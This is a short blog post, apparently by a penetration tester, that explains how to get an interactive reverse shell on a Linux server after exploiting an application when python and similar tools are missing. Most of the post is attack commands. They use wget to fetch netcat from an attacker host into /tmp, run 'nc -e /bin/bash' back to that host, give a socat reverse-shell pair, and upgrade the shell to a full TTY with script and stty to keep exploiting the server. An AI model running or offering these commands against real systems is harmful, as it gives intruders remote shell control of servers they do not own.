Linux reverse shell without python.

During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought.

It was found that the go to technologies such as python, php, socat, ruby were unavailable so the following steps were taken in order to spawn the reverse shell and upgrade to tty as shown in the following exploit image:

First of all if you do not wish to go through the hassle of having tty with bash completion etc then merely fire the following command into the pseudo terminal:

/usr/bin/script -qc /bin/bash /dev/null
#followed by:
stty raw -echo; fg; reset

This will break you out of the pseudo terminal and into a tty shell, you can then su and carry out all other terminal based commands; for those wanting to jump through a couple of hoops and obtain a tty shell due to the above not working 100% then one of many ways to do this is below.

Copy over  NC and spawn a shell

Using wget and python’s SimpleHttpServer NC was easily moved over to the target:

Server: cd /tmp; wget http://10.x.x.x:9998/nc; chmod +x nc
Server: ./nc 10.x.x.x 9998 -e /bin/bash
Attacking Machine: cp /usr/bin/nc .; python -m SimpleHttpServer 9998
Attacking Machine: nc -nlvp 9998

Break out of pseudo shell and upgrade to a tty shell

In order to upgrade our shell we first need to break out of the pseudo shell we are in.
First we will need to upgrade to a pty shell, generally I would default to trusty python using the following:

python -c 'import pty; pty.spawn("/bin/bash")'
# OR Using SOCAT
Attacking Server: socat file:`tty`,raw,echo=0 tcp-listen:9998
Victim Machine: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.x.x.x:9998 

As neither of our prefered technologies were available we can fall back onto a more simple but what seems to be a long forgotten way of upgrading, which is using script.

Our our attacking machine which has caught the reverse nc shell we can simply breakout of our pseudo shell using the following command:

Attacking Machine: /usr/bin/script -qc /bin/bash /dev/null

All that is left is to do the following:
A: CTRL + Z to background the shell
B: paste or type the following into the terminal on the attacking machine.

stty raw -echo; fg; reset

Now you have a fully interactive shell with autocomplete and can continue to exploit the server and potentially execute su or local ssh commands on the server.

Granted there are many many more ways to achieve a the same shell, but using script seems to be overlooked quite often hence the post.

x  Powerful Protection for WordPress, from Shield Security
This Site Is Protected By